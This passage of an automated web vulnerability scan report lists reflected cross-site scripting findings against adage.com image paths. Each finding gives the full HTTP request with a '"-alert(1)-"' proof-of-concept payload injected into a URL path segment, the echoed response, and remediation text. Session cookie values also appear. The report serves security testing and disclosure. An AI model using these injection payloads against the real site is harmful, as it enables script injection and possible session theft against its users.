hbx.mlc    = "adage.com//images23e81"-alert(1)-"624d2126b2f/save-and-share-icons/icon-stumbleupon.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none
...[SNIP]...

1.38. http://adage.com//images/save-and-share-icons/icon-stumbleupon.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-stumbleupon.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70f1c"-alert(1)-"52bc10e1626 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons70f1c"-alert(1)-"52bc10e1626/icon-stumbleupon.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=E2A225669D2F29C00884475EB93848458FB9EF8B; path=/
Set-Cookie: HMAC=F98E0BDCB0F72D70CD67C8B8CE6D47B0C6E8F00D; path=/
Set-Cookie: HMAC=94077089744211A45BDE1AE2164DE7A7323CFD49; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49485
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons70f1c"-alert(1)-"52bc10e1626/icon-stumbleupon.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js
...[SNIP]...

1.39. http://adage.com//images/save-and-share-icons/icon-stumbleupon.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-stumbleupon.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bceff"-alert(1)-"43132adc9ae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-stumbleupon.pngbceff"-alert(1)-"43132adc9ae?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=594BF58730F7B8396E727A075A61399E7156ED14; path=/
Set-Cookie: HMAC=9EACCB83F273F595F3F5D485BDA2D753F19DA42B; path=/
Set-Cookie: HMAC=AD8CA8B1255F6AE252554E4479C41323EDA8E15C; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49485
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-stumbleupon.pngbceff"-alert(1)-"43132adc9ae"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.40. http://adage.com//images/save-and-share-icons/icon-twitter.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-twitter.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6724"-alert(1)-"3898a6cbc75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //imagesc6724"-alert(1)-"3898a6cbc75/save-and-share-icons/icon-twitter.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=BE6BDC036641CF37D22A00031EEB10C66BDA5372; path=/
Set-Cookie: HMAC=90D4611C5D43286CE82E6E9D3B403D8D9FB259A1; path=/
Set-Cookie: HMAC=5D98CE82537224CFA1E0DDAE383B11DCB07158AC; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49481
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//imagesc6724"-alert(1)-"3898a6cbc75/save-and-share-icons/icon-twitter.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
h
...[SNIP]...

1.41. http://adage.com//images/save-and-share-icons/icon-twitter.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-twitter.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dd3e"-alert(1)-"787499129a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons9dd3e"-alert(1)-"787499129a0/icon-twitter.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:12 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=DE481D219602428CB86582296BBF91DE1B59666F; path=/
Set-Cookie: HMAC=25C5C0AA974C7A12CF62373DF7B434F5927A5F21; path=/
Set-Cookie: HMAC=9E9C856F8FADD5E4542522D4C9B613FDEF821CCC; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49481
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons9dd3e"-alert(1)-"787499129a0/icon-twitter.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
h
...[SNIP]...

1.42. http://adage.com//images/save-and-share-icons/icon-twitter.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-twitter.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25b30"-alert(1)-"9953fe8144b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-twitter.png25b30"-alert(1)-"9953fe8144b?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:40 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=E2D3BE55BB99E37EBC462E412B60F8D224A880DB; path=/
Set-Cookie: HMAC=6AF7FCFBE9C27F9D0898656444984BA64F00CCFD; path=/
Set-Cookie: HMAC=35CF4A07B56BD7724BE8DF5E4D322D486F0F8208; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49481
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-twitter.png25b30"-alert(1)-"9953fe8144b"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.43. http://adage.com//images/save-and-share-icons/icon-windows-live.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-windows-live.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5717a"-alert(1)-"218f6484cfb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images5717a"-alert(1)-"218f6484cfb/save-and-share-icons/icon-windows-live.png?1291744535 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=3571C49AD493663EDCD59969AFB4EE1269945125; path=/
Set-Cookie: HMAC=B2B1908A2F0107885D0186DF26638E23A8B54C5C; path=/
Set-Cookie: HMAC=D9B323C1FA6BD20B8F2761906BC82531F9B25514; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49486
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744535";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images5717a"-alert(1)-"218f6484cfb/save-and-share-icons/icon-windows-live.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="non
...[SNIP]...

1.44. http://adage.com//images/save-and-share-icons/icon-windows-live.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-windows-live.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70d3c"-alert(1)-"8b3b1df80a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons70d3c"-alert(1)-"8b3b1df80a2/icon-windows-live.png?1291744535 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=1FAC74C2E630C70CB84086317BE912578FC2DEA6; path=/
Set-Cookie: HMAC=3E89AB9A509E7F907AE3EA6559D541A3AC9F6D0A; path=/
Set-Cookie: HMAC=28C3285E3FBD9B9B6D2DD7EC6B62459EF11C937A; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49486
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744535";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons70d3c"-alert(1)-"8b3b1df80a2/icon-windows-live.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.j
...[SNIP]...

1.45. http://adage.com//images/save-and-share-icons/icon-windows-live.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-windows-live.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d22f2"-alert(1)-"e9197d2134d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-windows-live.pngd22f2"-alert(1)-"e9197d2134d?1291744535 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=24E5A2D36E3724EFFD0F6D9626C5B9854905EC02; path=/
Set-Cookie: HMAC=983E1084E5656B5CC28592D0DBC65B9ED2D13E38; path=/
Set-Cookie: HMAC=7D6FF0020A157C95BAC35D846E3BE65667B9A4FB; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49486
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...


//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744535";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-windows-live.pngd22f2"-alert(1)-"e9197d2134d"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.46. http://adage.com//images/save-and-share-icons/icon-yahoo.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-yahoo.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dea1"-alert(1)-"006abeca062 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images9dea1"-alert(1)-"006abeca062/save-and-share-icons/icon-yahoo.png?1291744535 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=D01DBB7E21A4C054740848B34F2EFD583D4F4A29; path=/
Set-Cookie: HMAC=37940D28AD9CF13B2826DAA4700BA8363D19E30C; path=/
Set-Cookie: HMAC=07846E9EF77BE9A14BDBE2FBF3D746481A7BE416; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49479
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744535";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images9dea1"-alert(1)-"006abeca062/save-and-share-icons/icon-yahoo.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx
...[SNIP]...

1.47. http://adage.com//images/save-and-share-icons/icon-yahoo.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-yahoo.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb300"-alert(1)-"409ac85f166 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-iconsbb300"-alert(1)-"409ac85f166/icon-yahoo.png?1291744535 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=46D2ED7049869FE81AB5B21DDD5E87B977167929; path=/
Set-Cookie: HMAC=764A894DE96C847ADE320F6FD3EC1E09931AB6D6; path=/
Set-Cookie: HMAC=A60C29673AEA9BF9468BD13CFDAA79DE99C64DCE; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49479
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744535";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-iconsbb300"-alert(1)-"409ac85f166/icon-yahoo.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx
...[SNIP]...

1.48. http://adage.com//images/save-and-share-icons/icon-yahoo.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-yahoo.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7777"-alert(1)-"a13f0a5b58b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-yahoo.pngb7777"-alert(1)-"a13f0a5b58b?1291744535 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
